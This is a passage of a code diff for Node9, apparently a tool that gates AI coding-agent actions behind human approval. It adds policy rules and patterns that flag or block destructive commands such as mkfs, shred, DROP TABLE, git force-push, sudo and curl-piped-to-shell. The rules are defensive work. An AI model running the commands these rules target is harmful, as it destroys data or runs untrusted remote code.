const DANGEROUS_WORDS = [ 'format', ]; */ +// Intentionally minimal — only words that are catastrophic AND never appear +// in legitimate code/content. 
Everything else is handled by smart rules, +// which can scope to specific tool fields and avoid false positives. export const DANGEROUS_WORDS = [ - 'drop', - 'truncate', - 'purge', - 'format', - 'destroy', - 'terminate', - 'revoke', - 'docker', - 'psql', + 'mkfs', // formats/wipes a filesystem partition + 'shred', // permanently overwrites file contents (unrecoverable) ]; // 2. The Master Default Config @@ -526,6 +524,8 @@ export const DEFAULT_CONFIG: Config = { ignorePaths: ['**/node_modules/**', 'dist/**', 'build/**', '.next/**', '**/*.log'], }, rules: [ + // Only use the legacy rules format for simple path-based rm control. + // All other command-level enforcement lives in smartRules below. { action: 'rm', allowPaths: [ @@ -542,6 +542,7 @@ export const DEFAULT_CONFIG: Config = { }, ], smartRules: [ + // ── SQL safety ──────────────────────────────────────────────────────── { name: 'no-delete-without-where', tool: '*', @@ -553,6 +554,84 @@ export const DEFAULT_CONFIG: Config = { verdict: 'review', reason: 'DELETE/UPDATE without WHERE clause — would affect every row in the table', }, + { + name: 'review-drop-truncate-shell', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: '\\b(DROP|TRUNCATE)\\s+(TABLE|DATABASE|SCHEMA|INDEX)', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'review', + reason: 'SQL DDL destructive statement inside a shell command', + }, + // ── Git safety ──────────────────────────────────────────────────────── + { + name: 'block-force-push', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: 'git push.*(--force|--force-with-lease|-f\\b)', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'block', + reason: 'Force push overwrites remote history and cannot be undone', + }, + { + name: 'review-git-push', + tool: 'bash', + conditions: [{ field: 'command', op: 'matches', value: '^\\s*git push\\b', flags: 'i' }], + conditionMode: 'all', + verdict: 'review', + reason: 
'git push sends changes to a shared remote', + }, + { + name: 'review-git-destructive', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: 'git\\s+(reset\\s+--hard|clean\\s+-[fdxX]|rebase|tag\\s+-d|branch\\s+-[dD])', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'review', + reason: 'Destructive git operation — discards history or working-tree changes', + }, + // ── Shell safety ────────────────────────────────────────────────────── + { + name: 'review-sudo', + tool: 'bash', + conditions: [{ field: 'command', op: 'matches', value: '^\\s*sudo\\s', flags: 'i' }], + conditionMode: 'all', + verdict: 'review', + reason: 'Command requires elevated privileges', + }, + { + name: 'review-curl-pipe-shell', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: '(curl|wget)[^|]*\\|\\s*(ba|z|da|fi|c|k)?sh', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'block', + reason: 'Piping remote script into a shell is a supply-chain attack vector', + }, ], }, environments: {}, @@ -639,6 +718,8 @@ export async function evaluatePolicy( reason?: string; matchedField?: string; matchedWord?: string; + tier?: 1 | 2 | 3 | 4 | 5 | 6 | 7; + ruleName?: string; }> { const config = getConfig(); @@ -656,6 +737,8 @@ export async function evaluatePolicy( decision: matchedRule.verdict, blockedByLabel: `Smart Rule: ${matchedRule.name ?? matchedRule.tool}`, reason: matchedRule.reason, + tier: 2, + ruleName: matchedRule.name ?? 
matchedRule.tool, }; } } @@ -675,7 +758,7 @@ export async function evaluatePolicy( // Inline arbitrary code execution is always a review const INLINE_EXEC_PATTERN = /^(python3?|bash|sh|zsh|perl|ruby|node|php|lua)\s+(-c|-e|-eval)\s/i; if (INLINE_EXEC_PATTERN.test(shellCommand.trim())) { - return { decision: 'review', blockedByLabel: 'Node9 Standard (Inline Execution)' }; + return { decision: 'review', blockedByLabel: 'Node9 Standard (Inline Execution)', tier: 3 }; } // Strip DML keywords from tokens so user dangerousWords like "delete"/"update" @@ -714,7 +797,7 @@ export async function evaluatePolicy( if (hasSystemDisaster || isRootWipe) { // If it IS a system disaster, return review so the dev gets a // "Manual Nuclear Protection" popup as a final safety check. - return { decision: 'review', blockedByLabel: 'Manual Nuclear Protection' }; + return { decision: 'review', blockedByLabel: 'Manual Nuclear Protection', tier: 3 }; } // For everything else (docker, psql, rmdir, delete, rm), @@ -740,6 +823,7 @@ export async function evaluatePolicy( return { decision: 'review', blockedByLabel: `Project/Global Config — rule "${rule.action}" (path blocked)`, + tier: 5, }; const allAllowed = pathTokens.every((p) => matchesPattern(p, rule.allowPaths || [])); if (allAllowed) return { decision: 'allow' }; @@ -747,6 +831,7 @@ export async function evaluatePolicy( return { decision: 'review', blockedByLabel: `Project/Global Config — rule "${rule.action}" (default block)`, + tier: 5, }; } } @@ -798,6 +883,7 @@ export async function evaluatePolicy( blockedByLabel: `Project/Global Config — dangerous word: "${matchedDangerousWord}"`, matchedWord: matchedDangerousWord, matchedField, + tier: 6, }; } @@ -805,7 +891,7 @@ export async function evaluatePolicy( if (config.settings.mode === 'strict') { const envConfig = getActiveEnvironment(config); if (envConfig?.requireApproval === false) return { decision: 'allow' }; - return { decision: 'review', blockedByLabel: 'Global Config (Strict Mode 
Active)' }; + return { decision: 'review', blockedByLabel: 'Global Config (Strict Mode Active)', tier: 7 }; } return { decision: 'allow' }; @@ -1215,7 +1301,8 @@ async function askDaemon( toolName: string, args: unknown, meta?: { agent?: string; mcpServer?: string }, - signal?: AbortSignal // NEW: Added signal + signal?: AbortSignal, + riskMetadata?: RiskMetadata ): Promise<'allow' | 'deny' | 'abandoned'> { const base = `http://${DAEMON_HOST}:${DAEMON_PORT}`; @@ -1229,7 +1316,13 @@ async function askDaemon( const checkRes = await fetch(`${base}/check`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, - body: JSON.stringify({ toolName, args, agent: meta?.agent, mcpServer: meta?.mcpServer }), + body: JSON.stringify({ + toolName, + args, + agent: meta?.agent, + mcpServer: meta?.mcpServer, + ...(riskMetadata && { riskMetadata }), + }), signal: checkCtrl.signal, }); if (!checkRes.ok) throw new Error('Daemon fail'); @@ -1261,7 +1354,8 @@ async function askDaemon( async function notifyDaemonViewer( toolName: string, args: unknown, - meta?: { agent?: string; mcpServer?: string } + meta?: { agent?: string; mcpServer?: string }, + riskMetadata?: RiskMetadata ): Promise { const base = `http://${DAEMON_HOST}:${DAEMON_PORT}`; const res = await fetch(`${base}/check`, { @@ -1273,6 +1367,7 @@ async function notifyDaemonViewer( slackDelegated: true, agent: meta?.agent, mcpServer: meta?.mcpServer, + ...(riskMetadata && { riskMetadata }), }), signal: AbortSignal.timeout(3000), }); @@ -1381,12 +1476,18 @@ export async function authorizeHeadless( let explainableLabel = 'Local Config'; let policyMatchedField: string | undefined; let policyMatchedWord: string | undefined; + let riskMetadata: RiskMetadata | undefined; if (config.settings.mode === 'audit') { if (!isIgnoredTool(toolName)) { const policyResult = await evaluatePolicy(toolName, args, meta?.agent); if (policyResult.decision === 'review') { appendLocalAudit(toolName, args, 'allow', 'audit-mode', meta); + // 
Must await — process.exit(0) follows immediately and kills any fire-and-forget fetch. + // Only send to SaaS when cloud is enabled — respects privacy mode (cloud: false). + if (approvers.cloud && creds?.apiKey) { + await auditLocalAllow(toolName, args, 'audit-mode', creds, meta); + } sendDesktopNotification( 'Node9 Audit Mode', `Would have blocked "${toolName}" (${policyResult.blockedByLabel || 'Local Config'}) — running in audit mode` @@ -1399,13 +1500,15 @@ export async function authorizeHeadless( // Fast Paths (Ignore, Trust, Policy Allow) if (!isIgnoredTool(toolName)) { if (getActiveTrustSession(toolName)) { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'trust', creds, meta); + if (approvers.cloud && creds?.apiKey) + await auditLocalAllow(toolName, args, 'trust', creds, meta); if (!isManual) appendLocalAudit(toolName, args, 'allow', 'trust', meta); return { approved: true, checkedBy: 'trust' }; } const policyResult = await evaluatePolicy(toolName, args, meta?.agent); if (policyResult.decision === 'allow') { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'local-policy', creds, meta); + if (approvers.cloud && creds?.apiKey) + auditLocalAllow(toolName, args, 'local-policy', creds, meta); if (!isManual) appendLocalAudit(toolName, args, 'allow', 'local-policy', meta); return { approved: true, checkedBy: 'local-policy' }; } @@ -1424,10 +1527,19 @@ export async function authorizeHeadless( explainableLabel = policyResult.blockedByLabel || 'Local Config'; policyMatchedField = policyResult.matchedField; policyMatchedWord = policyResult.matchedWord; + riskMetadata = computeRiskMetadata( + args, + policyResult.tier ?? 
6, + explainableLabel, + policyMatchedField, + policyMatchedWord, + policyResult.ruleName + ); const persistent = getPersistentDecision(toolName); if (persistent === 'allow') { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'persistent', creds, meta); + if (approvers.cloud && creds?.apiKey) + await auditLocalAllow(toolName, args, 'persistent', creds, meta); if (!isManual) appendLocalAudit(toolName, args, 'allow', 'persistent', meta); return { approved: true, checkedBy: 'persistent' }; } @@ -1441,7 +1553,8 @@ export async function authorizeHeadless( }; } } else { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'ignoredTools', creds, meta); + // ignoredTools (read, glob, grep, ls…) fire on every agent operation — too + // frequent and too noisy to send to the SaaS audit log. if (!isManual) appendLocalAudit(toolName, args, 'allow', 'ignored', meta); return { approved: true }; } @@ -1453,9 +1566,21 @@ export async function authorizeHeadless( if (cloudEnforced) { try { - const initResult = await initNode9SaaS(toolName, args, creds!, meta); + const initResult = await initNode9SaaS(toolName, args, creds!, meta, riskMetadata); if (!initResult.pending) { + // Shadow mode: allowed through, but warn the developer passively + if (initResult.shadowMode) { + console.error( + chalk.yellow( + `\n⚠️ Node9 Shadow Mode: Action allowed, but would have been blocked by company policy.` + ) + ); + if (initResult.shadowReason) { + console.error(chalk.dim(` Reason: ${initResult.shadowReason}\n`)); + } + return { approved: true, checkedBy: 'cloud' }; + } return { approved: !!initResult.approved, reason: @@ -1495,18 +1620,23 @@ export async function authorizeHeadless( // Print before the race so the message is guaranteed to show regardless of // which channel wins (cloud message was previously lost when native popup // resolved first and aborted the race before pollNode9SaaS could print it). 
- if (cloudEnforced && cloudRequestId) { - console.error( - chalk.yellow('\n🛡️ Node9: Action suspended — waiting for Organization approval.') - ); - console.error(chalk.cyan(' Dashboard → ') + chalk.bold('Mission Control > Activity Feed\n')); - } else if (!cloudEnforced) { - const cloudOffReason = !creds?.apiKey - ? 'no API key — run `node9 login` to connect' - : 'privacy mode (cloud disabled)'; - console.error( - chalk.dim(`\n🛡️ Node9: intercepted "${toolName}" — cloud off (${cloudOffReason})\n`) - ); + // Skip when called from the daemon — the CLI already printed this message. + if (!options?.calledFromDaemon) { + if (cloudEnforced && cloudRequestId) { + console.error( + chalk.yellow('\n🛡️ Node9: Action suspended — waiting for Organization approval.') + ); + console.error( + chalk.cyan(' Dashboard → ') + chalk.bold('Mission Control > Activity Feed\n') + ); + } else if (!cloudEnforced) { + const cloudOffReason = !creds?.apiKey + ? 'no API key — run `node9 login` to connect' + : 'privacy mode (cloud disabled)'; + console.error( + chalk.dim(`\n🛡️ Node9: intercepted "${toolName}" — cloud off (${cloudOffReason})\n`) + ); + } } // ── THE MULTI-CHANNEL RACE ENGINE ────────────────────────────────────────── @@ -1544,7 +1674,9 @@ export async function authorizeHeadless( (async () => { try { if (isDaemonRunning() && internalToken && !options?.calledFromDaemon) { - viewerId = await notifyDaemonViewer(toolName, args, meta).catch(() => null); + viewerId = await notifyDaemonViewer(toolName, args, meta, riskMetadata).catch( + () => null + ); } const cloudResult = await pollNode9SaaS(cloudRequestId, creds!, signal); @@ -1567,7 +1699,10 @@ export async function authorizeHeadless( } // 🏁 RACER 2: Native OS Popup - if (approvers.native && !isManual) { + // Skip when called from the daemon's background pipeline — the CLI already + // launched this popup as part of its own race; firing it a second time from + // the daemon would show a duplicate popup for the same request. 
+ if (approvers.native && !isManual && !options?.calledFromDaemon) { racePromises.push( (async () => { // Pass isRemoteLocked so the popup knows to hide the "Allow" button @@ -1602,7 +1737,10 @@ export async function authorizeHeadless( } // 🏁 RACER 3: Browser Dashboard - if (approvers.browser && isDaemonRunning() && !options?.calledFromDaemon) { + // Skip when cloudEnforced — notifyDaemonViewer already created a viewer card on + // the dashboard. Running askDaemon on top would create a second duplicate entry, + // open a second browser tab, and fire a second daemon authorizeHeadless call. + if (approvers.browser && isDaemonRunning() && !options?.calledFromDaemon && !cloudEnforced) { racePromises.push( (async () => { try { @@ -1613,7 +1751,7 @@ export async function authorizeHeadless( console.error(chalk.cyan(` URL → http://${DAEMON_HOST}:${DAEMON_PORT}/\n`)); } - const daemonDecision = await askDaemon(toolName, args, meta, signal); + const daemonDecision = await askDaemon(toolName, args, meta, signal, riskMetadata); if (daemonDecision === 'abandoned') throw new Error('Abandoned'); const isApproved = daemonDecision === 'allow'; @@ -1871,11 +2009,23 @@ export function getConfig(): Config { function tryLoadConfig(filePath: string): Record | null { if (!fs.existsSync(filePath)) return null; + let raw: unknown; try { - return JSON.parse(fs.readFileSync(filePath, 'utf-8')) as Record; - } catch { + raw = JSON.parse(fs.readFileSync(filePath, 'utf-8')); + } catch (err) { + const msg = err instanceof Error ? 
err.message : String(err); + process.stderr.write( + `\n⚠️ Node9: Failed to parse ${filePath}\n ${msg}\n → Using default config\n\n` + ); return null; } + const { sanitized, error } = sanitizeConfig(raw); + if (error) { + process.stderr.write( + `\n⚠️ Node9: Invalid config at ${filePath}:\n${error.replace('Invalid config:\n', '')}\n → Invalid fields ignored, using defaults for those keys\n\n` + ); + } + return sanitized; } function getActiveEnvironment(config: Config): EnvironmentConfig | null { @@ -1927,8 +2077,9 @@ export interface CloudApprovalResult { } /** - * Fire-and-forget: send an audit record to the backend for a locally fast-pathed call. - * Never blocks the agent — failures are silently ignored. + * Send an audit record to the SaaS backend for a locally fast-pathed call. + * Returns a Promise so callers that precede process.exit(0) can await it. + * Failures are silently ignored — never blocks the agent. */ function auditLocalAllow( toolName: string, @@ -1936,11 +2087,8 @@ function auditLocalAllow( checkedBy: string, creds: { apiKey: string; apiUrl: string }, meta?: { agent?: string; mcpServer?: string } -): void { - const controller = new AbortController(); - setTimeout(() => controller.abort(), 5000); - - fetch(`${creds.apiUrl}/audit`, { +): Promise { + return fetch(`${creds.apiUrl}/audit`, { method: 'POST', headers: { 'Content-Type': 'application/json', Authorization: `Bearer ${creds.apiKey}` }, body: JSON.stringify({ @@ -1955,8 +2103,10 @@ function auditLocalAllow( platform: os.platform(), }, }), - signal: controller.signal, - }).catch(() => {}); + signal: AbortSignal.timeout(5000), + }) + .then(() => {}) + .catch(() => {}); } /** @@ -1966,13 +2116,16 @@ async function initNode9SaaS( toolName: string, args: unknown, creds: { apiKey: string; apiUrl: string }, - meta?: { agent?: string; mcpServer?: string } + meta?: { agent?: string; mcpServer?: string }, + riskMetadata?: RiskMetadata ): Promise<{ pending: boolean; requestId?: string; approved?: 
boolean; reason?: string; remoteApprovalOnly?: boolean; + shadowMode?: boolean; + shadowReason?: string; }> { const controller = new AbortController(); const timeout = setTimeout(() => controller.abort(), 10000); @@ -1991,6 +2144,7 @@ async function initNode9SaaS( cwd: process.cwd(), platform: os.platform(), }, + ...(riskMetadata && { riskMetadata }), }), signal: controller.signal, }); @@ -2004,6 +2158,8 @@ async function initNode9SaaS( approved?: boolean; reason?: string; remoteApprovalOnly?: boolean; + shadowMode?: boolean; + shadowReason?: string; }; } finally { clearTimeout(timeout); diff --git a/src/daemon/index.ts b/src/daemon/index.ts index 819ba80..3f30d8f 100644 --- a/src/daemon/index.ts +++ b/src/daemon/index.ts @@ -1,5 +1,6 @@ // src/daemon/index.ts — Node9 localhost approval server import { UI_HTML_TEMPLATE } from './ui'; +import { RiskMetadata } from '../context-sniper'; import http from 'http'; import fs from 'fs'; import path from 'path'; @@ -7,7 +8,7 @@ import os from 'os'; import { spawn } from 'child_process'; import { randomUUID } from 'crypto'; import chalk from 'chalk'; -import { authorizeHeadless, getGlobalSettings, getConfig } from '../core'; +import { authorizeHeadless, getGlobalSettings, getConfig, _resetConfigCache } from '../core'; export const DAEMON_PORT = 7391; export const DAEMON_HOST = '127.0.0.1'; @@ -136,6 +137,7 @@ interface PendingEntry { id: string; toolName: string; args: unknown; + riskMetadata?: RiskMetadata; agent?: string; mcpServer?: string; timestamp: number; @@ -274,6 +276,7 @@ export function startDaemon(): void { id: e.id, toolName: e.toolName, args: e.args, + riskMetadata: e.riskMetadata, slackDelegated: e.slackDelegated, timestamp: e.timestamp, agent: e.agent, @@ -300,15 +303,24 @@ export function startDaemon(): void { if (req.method === 'POST' && pathname === '/check') { try { resetIdleTimer(); // Agent is active, reset the shutdown clock + _resetConfigCache(); // Always read fresh config — catches login/manual 
edits without restart const body = await readBody(req); if (body.length > 65_536) return res.writeHead(413).end(); - const { toolName, args, slackDelegated = false, agent, mcpServer } = JSON.parse(body); + const { + toolName, + args, + slackDelegated = false, + agent, + mcpServer, + riskMetadata, + } = JSON.parse(body); const id = randomUUID(); const entry: PendingEntry = { id, toolName, args, + riskMetadata: riskMetadata ?? undefined, agent: typeof agent === 'string' ? agent : undefined, mcpServer: typeof mcpServer === 'string' ? mcpServer : undefined, slackDelegated: !!slackDelegated, @@ -340,6 +352,7 @@ export function startDaemon(): void { id, toolName, args, + riskMetadata: entry.riskMetadata, slackDelegated: entry.slackDelegated, agent: entry.agent, mcpServer: entry.mcpServer, diff --git a/src/daemon/ui.html b/src/daemon/ui.html index 692b854..9dfd27e 100644 --- a/src/daemon/ui.html +++ b/src/daemon/ui.html @@ -225,6 +225,55 @@ white-space: pre-wrap; word-break: break-all; } + /* ── Context Sniper ─────────────────────────────────────────── */ + .sniper-header { + display: flex; + align-items: center; + gap: 8px; + flex-wrap: wrap; + margin-bottom: 8px; + } + .sniper-badge { + font-size: 11px; + font-weight: 600; + padding: 3px 8px; + border-radius: 5px; + letter-spacing: 0.02em; + } + .sniper-badge-edit { + background: rgba(59, 130, 246, 0.15); + color: #60a5fa; + border: 1px solid rgba(59, 130, 246, 0.3); + } + .sniper-badge-exec { + background: rgba(239, 68, 68, 0.12); + color: #f87171; + border: 1px solid rgba(239, 68, 68, 0.25); + } + .sniper-tier { + font-size: 10px; + color: var(--muted); + font-family: 'Fira Code', monospace; + } + .sniper-filepath { + font-size: 11px; + color: #a8b3c4; + font-family: 'Fira Code', monospace; + margin-bottom: 6px; + word-break: break-all; + } + .sniper-match { + font-size: 11px; + color: #a8b3c4; + margin-bottom: 6px; + } + .sniper-match code { + background: rgba(239, 68, 68, 0.15); + color: #f87171; + padding: 1px 
5px; + border-radius: 3px; + font-family: 'Fira Code', monospace; + } .actions { display: grid; grid-template-columns: 1fr 1fr; @@ -731,20 +780,47 @@

✅ Slack key saved

}, 200); } + function renderPayload(req) { + const rm = req.riskMetadata; + if (!rm) { + // Fallback: raw args for requests without context sniper data + const cmd = esc( + String( + req.args && + (req.args.command || + req.args.cmd || + req.args.script || + JSON.stringify(req.args, null, 2)) + ) + ); + return `Input Payload
${cmd}
`; + } + const isEdit = rm.intent === 'EDIT'; + const badgeClass = isEdit ? 'sniper-badge-edit' : 'sniper-badge-exec'; + const badgeLabel = isEdit ? '📝 Code Edit' : '🛑 Execution'; + const tierLabel = `Tier ${rm.tier} · ${esc(rm.blockedByLabel)}`; + const fileLine = + isEdit && rm.editFilePath + ? `
📂 ${esc(rm.editFilePath)}
` + : !isEdit && rm.matchedWord + ? `
Matched: ${esc(rm.matchedWord)}${rm.matchedField ? ` in ${esc(rm.matchedField)}` : ''}
` + : ''; + const snippetHtml = rm.contextSnippet ? `
${esc(rm.contextSnippet)}
` : ''; + return ` +
+ ${badgeLabel} + ${tierLabel} +
+ ${fileLine} + ${snippetHtml} + `; + } + function addCard(req) { if (requests.has(req.id)) return; requests.add(req.id); refresh(); const isSlack = !!req.slackDelegated; - const cmd = esc( - String( - req.args && - (req.args.command || - req.args.cmd || - req.args.script || - JSON.stringify(req.args, null, 2)) - ) - ); const card = document.createElement('div'); card.className = 'card' + (isSlack ? ' slack-viewer' : ''); card.id = 'c-' + req.id; @@ -758,8 +834,7 @@

✅ Slack key saved

${esc(req.toolName)}
${isSlack ? '
⚡ Awaiting Slack approval — view only
' : ''} - Input Payload -
${cmd}
+ ${renderPayload(req)}
diff --git a/src/ui/native.ts b/src/ui/native.ts index 3be2a72..90e828e 100644 --- a/src/ui/native.ts +++ b/src/ui/native.ts @@ -2,6 +2,7 @@ import { spawn, ChildProcess } from 'child_process'; import path from 'path'; import chalk from 'chalk'; +import { smartTruncate, extractContext } from '../context-sniper'; const isTestEnv = () => { return ( @@ -14,50 +15,6 @@ const isTestEnv = () => { ); }; -/** - * Truncates long strings by keeping the start and end. - */ -function smartTruncate(str: string, maxLen: number = 500): string { - if (str.length <= maxLen) return str; - const edge = Math.floor(maxLen / 2) - 3; - return `${str.slice(0, edge)} ... ${str.slice(-edge)}`; -} - -/** - * Shows 3 lines of context around the dangerous word. - * Prefers non-comment lines when the word appears in multiple places. - */ -function extractContext(text: string, matchedWord?: string): string { - const lines = text.split('\n'); - if (lines.length <= 7 || !matchedWord) return smartTruncate(text, 500); - - const escaped = matchedWord.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); - const pattern = new RegExp(`\\b${escaped}\\b`, 'i'); - - const allHits = lines.map((line, i) => ({ i, line })).filter(({ line }) => pattern.test(line)); - if (allHits.length === 0) return smartTruncate(text, 500); - - // Prefer lines that aren't pure comments - const nonComment = allHits.find(({ line }) => { - const trimmed = line.trim(); - return !trimmed.startsWith('//') && !trimmed.startsWith('#'); - }); - const hitIndex = (nonComment ?? allHits[0]).i; - - const start = Math.max(0, hitIndex - 3); - const end = Math.min(lines.length, hitIndex + 4); - - const snippet = lines - .slice(start, end) - .map((line, i) => `${start + i === hitIndex ? '🛑 ' : ' '}${line}`) - .join('\n'); - - const head = start > 0 ? `... [${start} lines hidden] ...\n` : ''; - const tail = end < lines.length ? `\n... 
[${lines.length - end} lines hidden] ...` : ''; - - return `${head}${snippet}${tail}`; -} - function formatArgs( args: unknown, matchedField?: string, @@ -88,7 +45,7 @@ function formatArgs( if (obj.old_string !== undefined && obj.new_string !== undefined) { const file = obj.file_path ? path.basename(String(obj.file_path)) : 'file'; const oldPreview = smartTruncate(String(obj.old_string), 120); - const newPreview = extractContext(String(obj.new_string), matchedWord); + const newPreview = extractContext(String(obj.new_string), matchedWord).snippet; return { intent: 'EDIT', message: @@ -105,7 +62,7 @@ function formatArgs( otherKeys.length > 0 ? `⚙️ Context: ${otherKeys.map((k) => `${k}=${smartTruncate(typeof obj[k] === 'object' ? JSON.stringify(obj[k]) : String(obj[k]), 30)}`).join(', ')}\n\n` : ''; - const content = extractContext(String(obj[matchedField]), matchedWord); + const content = extractContext(String(obj[matchedField]), matchedWord).snippet; return { intent: 'EXEC', message: `${context}🛑 [${matchedField.toUpperCase()}]:\n${content}`,